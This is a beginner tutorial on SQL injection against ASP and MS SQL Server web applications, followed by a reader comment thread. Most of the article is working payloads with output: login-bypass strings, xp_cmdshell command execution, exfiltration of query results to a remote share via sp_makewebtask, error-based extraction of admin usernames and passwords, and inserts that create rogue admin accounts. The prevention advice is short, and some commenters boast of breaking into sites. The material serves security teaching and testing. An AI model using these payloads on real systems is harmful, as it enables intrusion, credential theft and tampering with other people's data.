|
|
| |
| The following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks. |
| |
Credit:
The information has been provided by SK.
|
| |
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
|
| Subject:
|
Good |
Date: |
24 Oct. 2005 |
| From: |
pawankumar2k1 at yahoo dot com |
| This was a good topic, but this topic lack, if developers have applied the security measures for SQL Injection, than how we injects SQL queries into web-applicatios |
|
| Subject:
|
Usefull Information |
Date: |
27 Oct. 2005 |
| From: |
anon. |
| This guide is very useful information. |
|
| Subject:
|
smart |
Date: |
9 Nov. 2005 |
| From: |
ntnijeeshyahoo.com |
| this was a smart topic.But as a developer i wand to learn more how to tighten the security of my applications against the injection
|
|
| Subject:
|
uhh... you dont |
Date: |
11 Nov. 2005 |
| From: |
anon. |
| If developers have applied the security measures to prevent SQL injection, then you can't inject SQL queries. It's something completely preventable by good coding practice and usually only is allowed when the developer is being lazy or sloppy. |
|
| Subject:
|
for php and mysql |
Date: |
15 Nov. 2005 |
| From: |
just me |
There is a nice article, that comes with a working solution for php+mysql injection.
http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html |
|
| Subject:
|
Another discussion |
Date: |
21 Nov. 2005 |
| From: |
Andrew |
| I discuss this subject with a basic introduction to SQL at the following address: http://andrew.absurdlycool.com/class/l7.html |
|
| Subject:
|
Usefull Information |
Date: |
5 Dec. 2005 |
| From: |
Janner Simarmata |
| This was a good topic, but this topic lack, if developers have applied the security measures for SQL Injection, than how we injects SQL queries into web-applicatios |
|
| Subject:
|
twisted metal |
Date: |
5 Dec. 2005 |
| From: |
Animemouse |
| although the developers have applied the security measure we still can swift the code to the other angle..just be creative...but it will take time though |
|
| Subject:
|
very good one |
Date: |
7 Dec. 2005 |
| From: |
eby |
| This is an excellent article. thanks a lot |
|
| Subject:
|
Good article but... |
Date: |
16 Dec. 2005 |
| From: |
shareefer |
Great article, except for one thing. As a matter of prevention, you should ALWAYS use stored procedures in your web code.
stored procedures interpret there parameters literally even if they contain SQL code. so all SQL injections are blocked... simple as that. no need for checking for dashes, quotes, SQL key words, ect. |
|
| Subject:
|
What The Doors Locked |
Date: |
26 Dec. 2005 |
| From: |
Dark Pontifex |
| Great Article For SQL Injection |
|
| Subject:
|
good for beginners |
Date: |
27 Dec. 2005 |
| From: |
la |
| A good beginning to understand. Thanks. |
|
| Subject:
|
good information |
Date: |
29 Dec. 2005 |
| From: |
sponsbobspyahoo.com |
good tutorial,
thank you |
|
| Subject:
|
Thank you for the information |
Date: |
4 Jan. 2006 |
| From: |
Padrino123 |
| This article really help me. Thanks for the information. |
|
| Subject:
|
Really Nice article |
Date: |
9 Jan. 2006 |
| From: |
Uppalapati Giri Prasad |
| This article is realy clear enough to understand the concept and rich in information to impleament an example.Thanks of publishing such a good article. |
|
| Subject:
|
quite well |
Date: |
18 Jan. 2006 |
| From: |
rajgremo_u_rajyahoo.com |
| This is well architectued data...............thnak you for giving data |
|
| Subject:
|
Stored Procs are not guaranteed protection |
Date: |
18 Jan. 2006 |
| From: |
dbjstein |
| In response to the note above, it is not I believe the case that stored procedures prevent SQL injection in all cases. Stored procedures are frequently set up to contain dynamic SQL, where the statement is constructed at runtime. In those cases, there is no precompiled statement, and therefore no prevention of SQL injection techniques. Only if the stored procedure contains a defined SQL statement with bind variables or parameters to be parsed into the statement, will it prevent SQL injection. |
|
| Subject:
|
Is it possible!! |
Date: |
19 Jan. 2006 |
| From: |
Deepak |
| SQL Injection is not possible in stored procedures...so it is the easiest way to prevent sql injection...Is any type of hacking possible, when using stored procedures?!! |
|
| Subject:
|
Very good article |
Date: |
19 Jan. 2006 |
| From: |
Deepak |
| It's a very nice article and expecting more like this...
|
|
| Subject:
|
very good topic to read |
Date: |
19 Jan. 2006 |
| From: |
prashant |
| It is useful to teach about what is SQL Injection. |
|
| Subject:
|
say so.. |
Date: |
21 Jan. 2006 |
| From: |
Burner |
this article is so usefull especially who are new about appl. developing, database designing, database admins, webserver admins,...etc and of course it is remainder for all of us but there is a problem about the bad users that they can use this information to launch attacks against certain places,
so this type of articles one way is good, one way is bad....
Should we put this kind of information on publick sites????
thanks |
|
| Subject:
|
Good Article |
Date: |
24 Jan. 2006 |
| From: |
Bob |
This is one of the best article i have ever seen about SQL Injection.........
But, in one way I do accept with burner whether to keep these sort of articles in public sites.. |
|
| Subject:
|
Why hide them from public eyes |
Date: |
29 Jan. 2006 |
| From: |
Dogman |
These things shouldn't be hidden from public eyes. There are a lot of developers that never heard about this concept and are writing injectable web applications. Also.. there are a lot of people that are using those applications.. This is a very good material and every developer should read it. Also every developer should read about securing their applications. Too bad they don't. I've met people with much more experience than me sustaining that stored procs are slower than calling the query straight from your application and so on..
I hope you all got my point. |
|
| Subject:
|
good |
Date: |
2 Feb. 2006 |
| From: |
alir9 |
| Today , we have some web applications that they don't patch 'or' in login page !!! this article was good but there is some different between ms-sql and mysql and no one explained ! |
|
| Subject:
|
great job dude |
Date: |
4 Feb. 2006 |
| From: |
Kevo |
| I really enjoyed reading this a lot thanks man!!1 |
|
| Subject:
|
none |
Date: |
9 Feb. 2006 |
| From: |
anon |
| With login pages don't most people store encrypted passwords using some sort of server side funtion to decrypt or compare? how would injection get past that for logging in? just curious because I tried the stuff in this article and wasn't able to login to a site I run, but i would like to fix the hole if this is still possible another way. |
|
| Subject:
|
Variance in SQL server error messages |
Date: |
10 Feb. 2006 |
| From: |
redeye |
I tried testing this on a site, using something similar to:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Instead of the useful
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
I get this:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting character string to smalldatetime data type.
/titlenews.inc, line 46
Is this a newer version of SQL server or a differently configured one, one which deliberately does not output the useful data? |
|
| Subject:
|
bind variables |
Date: |
10 Feb. 2006 |
| From: |
seph |
How is using a stored procedures going to prevent this?
... you just need to make sure you use bind variables. |
|
| Subject:
|
great but much brief |
Date: |
14 Feb. 2006 |
| From: |
neido |
| yeah it contains cool stuff but u have to make it more user friendly then this. |
|
| Subject:
|
COMMON |
Date: |
15 Feb. 2006 |
| From: |
hay |
| this trick is common i should find the better ones
|
|
| Subject:
|
SQL injection sux |
Date: |
21 Feb. 2006 |
| From: |
White HaCker |
I prefer LKM rootkit attacks for sun servers .
This could be used as a kernel hackin trick .
Just like the way i used to code buffer over flows for unix servers ... |
|
| Subject:
|
Php injection |
Date: |
22 Feb. 2006 |
| From: |
whisker |
Any php site fallen for SQL Injection , i read an article that only .asp and .cfm will fall easily
for SQL Injection ..let me know some comments on this ..if any one did SQL Injection on PHP Site please let me know i have fallen many asp sites with SQL injection . |
|
| Subject:
|
devakishore at yahoo.com |
Date: |
22 Feb. 2006 |
| From: |
etterdev |
we can know wheather the site is vulnerable to sql injection or not by the way they handle the errors ..but how to know which backend database the site is running is there any tool
for knowing that . |
|
| Subject:
|
nice article to get to know SQL injection |
Date: |
3 Mar. 2006 |
| From: |
Ashvinbodhale |
The attack can b foiled by already developed apps n also stored procs that are embedded inside code--- all works well.
chk this URL...http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html |
|
| Subject:
|
Nice tutorial |
Date: |
7 Mar. 2006 |
| From: |
cream_shady4uyahoo.com |
| The tutorial fairly teaches hacking through sql injection and preventive measures but what if web applications running another application different from sql server ? |
|
| Subject:
|
Nice tutorial |
Date: |
10 Mar. 2006 |
| From: |
cream_shady4uyahoo.com |
| The tutorial fairly teaches hacking through sql injection and preventive measures but what if web applications running another application different from sql server ? |
|
| Subject:
|
works on any database |
Date: |
10 Mar. 2006 |
| From: |
Spotty-faced Git |
| This is an attack that works on any database backend, not just SQL Server. You just have to replace the INFORMATION_SCHEMA table names with the appropriate system table names for the product you are working against. A SQL Injection attack is a result of manipulating the standard SQL query language (used by nearly all DB products), and bad coding practices by the web developer. It's completely DB agnostic at its basic level. |
|
| Subject:
|
how du u use this |
Date: |
12 Mar. 2006 |
| From: |
oLi |
| i tried to use this on a forum and it did nothing???? |
|
| Subject:
|
what about this solution |
Date: |
15 Mar. 2006 |
| From: |
da_man |
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("e;SELECT * FROM "e;.$tpref."e;users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'"e;);
//check login
if (mysql_num_rows($query_1) == 1){
|
|
| Subject:
|
what about this solution |
Date: |
15 Mar. 2006 |
| From: |
da_man |
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("e;SELECT * FROM "e;.$tpref."e;users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'"e;);
//check login
if (mysql_num_rows($query_1) == 1){
// do login stuff
} else {
// print error msg
}
how safe is that against sql injection? |
|
| Subject:
|
Not very safe... |
Date: |
21 Mar. 2006 |
| From: |
Nick Goloborodko |
At the very least that you need to do is to check for the input, and escape/remove all of the SQL special characters. Also, consider using SPs
Kind reagrds,
Nick Goloborodko |
|
| Subject:
|
Very Rich in Knowledge - Really Interesing |
Date: |
21 Mar. 2006 |
| From: |
Jabir Hussain |
| This is really rich in knowledge. It helped me a lot to secure my applications |
|
| Subject:
|
interesting |
Date: |
29 Mar. 2006 |
| From: |
pro |
| definitly makes you hungry for more information. I wonder where you could get a class in these techniques? |
|
| Subject:
|
this is my query...what can u send in the user name or password the inject this |
Date: |
30 Mar. 2006 |
| From: |
Elad |
strsql = "e;SELECT username, password "e; +
"e;FROM Agents "e; +
"e;WHERE (username = N'"e; + _UserName.ToString() + "e;') AND (password = N'"e; + _Password + "e;')"e;;
|
|
| Subject:
|
table names corresponding to different db |
Date: |
8 Apr. 2006 |
| From: |
sumit |
can u tell me what are the different system table names in context of different sql server.
eg. what do i replace INFORMATION_SCHEMA.TABLES in mysql server?
Thanks
|
|
| Subject:
|
what is the work of rank in sql injection |
Date: |
14 Apr. 2006 |
| From: |
anobscase |
| i just want to know the work of rank in sql injection |
|
| Subject:
|
Cool Stuff |
Date: |
5 May 2006 |
| From: |
Anand |
| Good Help ..for beginners....as a developer or security guy . |
|
| Subject:
|
:- |
Date: |
8 May 2006 |
| From: |
__ThE_BiG_DoG__ |
| i get all that stuff and i found out u can use perl to acess the codes of sql into sites but...i cant work out how 2 se that :-s any advice |
|
| Subject:
|
:) waw |
Date: |
12 May 2006 |
| From: |
_Mt_DB_ |
| i think this is a good information for security
|
|
| Subject:
|
With access DB |
Date: |
17 May 2006 |
| From: |
tieulongnuxinh |
I can't do it with access db:
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/aboutus_content.asp, line 18
|
|
| Subject:
|
(,) |
Date: |
17 May 2006 |
| From: |
wala lang |
| thank you |
|
| Subject:
|
What about... |
Date: |
18 May 2006 |
| From: |
ho |
| sql interjections? Are they as bad or can we just kinda ignore them? |
|
| Subject:
|
GoOD Article.. |
Date: |
22 May 2006 |
| From: |
Kumarkumskumar_005yahoo.com |
Hai,
This Is one of the Good Article which i found. I hope All Developers should read this Article.
May i expect some more SQL Injection with example.. |
|
| Subject:
|
Wonderfull artical |
Date: |
5 Jun. 2006 |
| From: |
Dev |
| Fine Article for the beginners... |
|
| Subject:
|
Good one |
Date: |
6 Jun. 2006 |
| From: |
Kalyani |
| Good article!!
|
|
| Subject:
|
Good Article |
Date: |
8 Jun. 2006 |
| From: |
Ramzan |
| Best Article, but i think this should be hidden from Mischivious People. |
|
| Subject:
|
Excellent! |
Date: |
8 Jun. 2006 |
| From: |
israelagnouhyattarahotmail.com |
| It's a shame not too many PHP+SQL admins limit how the client manipulates DBase data through injections. They worry too much about patching applications (which is not bad), but they should also consider focusing on these attacks, as they have proven to be extremely handy when everything is patched up. |
|
| Subject:
|
Cool Stuff |
Date: |
13 Jun. 2006 |
| From: |
habib.khalidhotmail.com |
| It's a nice article for every web developer,they should take care of SQL injection in order to improve better security. |
|
| Subject:
|
what about pot 443 |
Date: |
20 Jun. 2006 |
| From: |
Jeffro |
| Would this work the same if you were utilizing port 443 vs port 80??? |
|
| Subject:
|
Really Interesing!!!!!! |
Date: |
21 Jun. 2006 |
| From: |
skjha2000rediffmail.com |
Really interesting and helpful topic for web base application testing.
Regards,
Subodh Kumar Jha
Associate ?Test Engineer,
Aftek Infosys Ltd. +919823282061
|
|
| Subject:
|
Cool Stuff |
Date: |
29 Jun. 2006 |
| From: |
Jasthi Adi Vishnu Murthy |
| Interesting and helpful topic on Replication |
|
| Subject:
|
Really Interesting |
Date: |
6 Jul. 2006 |
| From: |
Somesh |
| Interesting and helpful topic for web base application testing. |
|
| Subject:
|
hello... |
Date: |
7 Jul. 2006 |
| From: |
Renu |
Hello there ..
this article is really much helpfulldespite of studying this concept very first time i got clear with this upto very much extent....But being a s/w tester i must know this concept
in detail. whatever projects i am working currently on, i am using VB.NET , ASP.NET &sql server tech So could any one of u tell me how it affects with this combination?? what are the things i have to test for incase of SQL security?? |
|
| Subject:
|
Best Write Up to Date |
Date: |
7 Jul. 2006 |
| From: |
UtmostBastard |
| Kudos to the author/s. This is by far the most in depth write up I have read. Thanks for taking the time to put this out!! |
|
| Subject:
|
HEllo there....... |
Date: |
8 Jul. 2006 |
| From: |
Renu |
HEllo there,
i have gone through this article & it's really helpful . But i do have one question,
if im using .net & SQL server tech. that time what kind of things i have to test for
from security point of view?? if possible please ans be back.....im workig with web applications using ASP.net
|
|
| Subject:
|
good article |
Date: |
13 Jul. 2006 |
| From: |
amoogye |
| it was good article to read. thank you |
|
| Subject:
|
I highly suggest you watch this video... |
Date: |
14 Jul. 2006 |
| From: |
Ralph |
I found this BLOG which has some SQL Injection info, along with a link of a video where a guy uses SQL injection to replace a logging dll on a webserver and captures credit card information.
Anyone who thinks this is no big deal needs to watch. Goto this URL and then look for the video link.
http://devauthority.com/blogs/jwooley/archive/2006/07/11/1672.aspx
|
|
| Subject:
|
nothing worked |
Date: |
17 Jul. 2006 |
| From: |
V8 |
| I'm using PHP/MySQL for some time now and i am used to filter user input but when I found this article I tried some of the injections on my server and none of them worked. Sorry. |
|
| Subject:
|
stored procedure |
Date: |
24 Jul. 2006 |
| From: |
Ivan |
| Stored procedures are not always safe because they construct a sql statement at runtime pretty much the same way as a program would. It is possible, however, that arguments are being passed to a stored procedure at runtime and that the actual SQL statement doesn't contain the arguments. There are sites which explain how to do this in SQL Server. |
|
| Subject:
|
jim |
Date: |
1 Aug. 2006 |
| From: |
jim.scuba.kennedygmail.com |
Very scary that people think the use of stored procs will protect them from sql injection. (or the use of a particular web or RDBMS technology)
Folks, USE BIND VARIABBLES. Don't allow dynamic SQL. If you want to use stored procs that is fine, but your stored procs better NOT use dynamic sql. This problem isn't soley a windows/sql server problem; it can appear on any db server and any OS with any language of you do it right. (wrong) Again use bind variables. Also bind variables scale better. |
|
| Subject:
|
the .NET tech |
Date: |
4 Aug. 2006 |
| From: |
Aaron |
| the .NET tech protect from malicious code in any inputs. The better option for security is the .NET development. |
|
| Subject:
|
Good reading |
Date: |
10 Aug. 2006 |
| From: |
Elijah Daniel |
This is very informative and a recommended reading.
Keep it up! |
|
| Subject:
|
very nice |
Date: |
16 Aug. 2006 |
| From: |
EtHeReAl |
really very nice article for newbies and experts
thx very much |
|
| Subject:
|
hello |
Date: |
16 Aug. 2006 |
| From: |
pls how can i find HTML source code of ulr |
| pls how can i find HTML source code of ulr |
|
| Subject:
|
my way |
Date: |
27 Aug. 2006 |
| From: |
felpharyahoo.com |
| Ya don't execute the code if contains ; / \ ' "e; = - is that simple. Why does anybody trye to comlicate it???? |
|
| Subject:
|
my way |
Date: |
7 Sep. 2006 |
| From: |
Libstar |
Not that simple felpharyahoo.com!! What if user requirement is to enter a string including one of these charaters? ; / \ ' "e; = - (e.g. surname O'Neill which includes an apostrophe)
You gonna tell your client they can't have what they need? They gonna tell ya, you're not getting paid!!! |
|
| Subject:
|
to the person above me |
Date: |
8 Sep. 2006 |
| From: |
LostDreamer |
Well, if you do not execute any sql query containing those digits, how would one make a forum ? or any place where people can post messages ?
when they use a word with a ' in it, the code would not execute the insert query .....
Also good option against SQL Injection is Magic Quotes.... replaces all the ' & "e; with ' & \"e; which would not end / alter the SQL query. |
|
| Subject:
|
Very useful article, but... |
Date: |
15 Sep. 2006 |
| From: |
iframe srcfileciframe |
| What about Cript() and Decript() functions? for numbers we haven't problem. If they are strings we can Cript and Decript data using an easy algorithm or we can restrict string value only if contains 1234567890ABCDEFG characters. |
|
| Subject:
|
The grammar in this article is horrific! |
Date: |
21 Sep. 2006 |
| From: |
I dont have time for this... |
| Seriously, proofread your pages. |
|
| Subject:
|
languagelibrary problem |
Date: |
23 Sep. 2006 |
| From: |
gaba |
Frankly people, this is rediculous. You folks should start getting on at your language designers to do things properly so this stuff is not a problem.
The only problem here is that data passed to SQL does not have 'special' characters quoted before it gets to the query.
You should be able to do this manually. However, you should be given library functions that automatically do this for you.
searchfor="e;myid"e;;
query="e;select * from table where id=?"e;;
executequery(query, searchfor);
If the execute query function autmatically removes all SQL injection problems, this is a non-issue.
I consider it a fatal language flaw not to have such a library issued as the standard database implementation. |
|
| Subject:
|
Seriosuly Lacking |
Date: |
24 Sep. 2006 |
| From: |
Rust |
So it's easy to see that this article is good information for the fledgling cracker out there, but what about sysadmins? There's a hundred lines on how to f*ck the system, but only 3 useful lines on how to prevent it.
Obviously, any competent server admin will have hardened his system, but what about all the developers out there? If they filter out "e;single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc"e;, what are they replaced with? A single-quote is easy to replace with two single-quotes (which are stored in the database as a single quote), but does that work for the rest? Nope.
Sorry folks, but this article is only useful to crackers and server admins. There is virtually no useful information for developers here. |
|
| Subject:
|
Regex |
Date: |
26 Sep. 2006 |
| From: |
Duhhhh |
| Just regex all the data being passed to the database to remove ' siiiiiiiiiiiiiiiimple |
|
| Subject:
|
great articel |
Date: |
3 Oct. 2006 |
| From: |
baba |
| thanjks |
|
| Subject:
|
thats just OK |
Date: |
6 Oct. 2006 |
| From: |
LongVN |
| How about SA privillages ? how about NC and Remote control |
|
| Subject:
|
Thanks much |
Date: |
7 Oct. 2006 |
| From: |
aashish_plycos.com |
| its really wonderful article.thanks much |
|
| Subject:
|
Thanks |
Date: |
12 Oct. 2006 |
| From: |
ckbandarayahoo.com |
| Its really nice article. Really i got lot from that. Thanks |
|
| Subject:
|
Great Topic for the Bigginers |
Date: |
17 Oct. 2006 |
| From: |
Salman Farsi |
| A unique article of its kind, which helpful for the bigginers. |
|
| Subject:
|
SQL injection on MS SQL and ASP. |
Date: |
17 Oct. 2006 |
| From: |
Vaclav |
I put an article on the web about MS SQL & ASP, including a practice example how it worked.
http://www.slavicek.net/misc/SqlInjection/index_en.htm |
|
| Subject:
|
